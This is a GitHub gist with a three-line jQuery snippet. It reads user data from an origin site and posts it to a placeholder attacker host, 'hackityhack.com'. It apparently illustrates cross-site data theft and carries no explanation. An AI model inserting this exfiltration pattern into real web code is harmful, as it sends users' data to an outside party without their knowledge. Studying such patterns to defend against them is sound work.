Skip to content

Instantly share code, notes, and snippets.

@Cfeusier
Created June 2, 2015 01:07
Show Gist options
  • Select an option

  • Save Cfeusier/3463967d1328a34ab7bf to your computer and use it in GitHub Desktop.

Select an option

Save Cfeusier/3463967d1328a34ab7bf to your computer and use it in GitHub Desktop.
$.get('https://origin-site.com/user-data', function(userData) {
$.post('http://hackityhack.com/users-to-exploit-data-storage', userData);
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment